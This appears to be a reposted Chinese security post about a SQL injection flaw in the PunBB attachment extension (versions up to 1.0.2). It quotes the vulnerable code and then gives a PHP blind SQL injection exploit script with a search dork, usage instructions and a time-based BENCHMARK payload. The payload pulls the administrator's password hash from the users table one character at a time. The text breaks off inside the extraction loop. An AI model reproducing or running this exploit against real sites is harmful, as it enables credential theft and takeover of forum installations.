作者:手机用户2502853217 | 来源:互联网 | 2017-11-12 01:52
PunBB官方上传附件扩展注射漏洞作者:Ryatif(isset($_GET[secure_str])){if(preg_match(~(\d+)f(\d+)~,$_GET[secure_str],$match)){...WHEREa.AND(fp.read_forumISNULLORfp.read_forum1)ANDsecure_
PunBB官方上传附件扩展注射漏洞
作者:Ryat
- if (isset($_GET[\'secure_str\']))
- {
- if (preg_match(\'~(d+)f(d+)~\', $_GET[\'secure_str\'], $match))
- {
- ...
- \'WHERE\' => \'a.id = \'.$attach_item.\' AND (fp.read_forum IS NULL OR fp.read_forum = 1) AND secure_str = \'\'.$_GET[\'secure_str\'].\'\'\'
挺明显的,应该是对正则表达式及preg_match函数的误用,导致可以通过$_GET[\'secure_str\']来触发sql inj...
另外,在pun_list_attach.php文件还有个注射,不过需要后台权限,有兴趣的同学自己看,那个要更明显些:)
最后给个PoC性质的EXP,具体效果和利用方式就别问我了...
- #!/usr/bin/php
-
- print_r(\'
- +---------------------------------------------------------------------------+
- Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
- by puret_t
- mail: puretot at gmail dot com
- team: http:
- dork: "Powered by PunBB"
- +---------------------------------------------------------------------------+
- \');
-
-
-
- if ($argc < 3) {
- print_r(\'
- +---------------------------------------------------------------------------+
- Usage: php \'.$argv[0].\' host path
- host: target server (ip/hostname)
- path: path to punbb
- Example:
- php \'.$argv[0].\' localhost /punbb/
- +---------------------------------------------------------------------------+
- \');
- exit;
- }
-
- error_reporting(7);
- ini_set(\'max_execution_time\', 0);
-
- $host = $argv[1];
- $path = $argv[2];
-
- $pre = \'pun_\';
-
- $benchmark = 200000000;
- $timeout = 10;
-
- echo "Plz Waiting...nPassword:n";
-
-
-
- $j = 1;
- $pass = \'\';
-
- $hash[0] = 0;
- $hash = array_merge($hash, range(48, 57));
- $hash = array_merge($hash, range(97, 122));
-
- while (strlen($pass) < 40) {
- for ($i = 0; $i <= 255; $i ++) {
- if (in_array($i, $hash)) {
- $cmd = \'1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20\'.$pre.\'users%20WHERE%20group_id=1%20LIMIT%201),\'.$j.\',1))=\'.$i.\'),BENCHMARK(\'.$benchmark.\',CHAR(0)),1))%23\';
- send();
- usleep(2000000);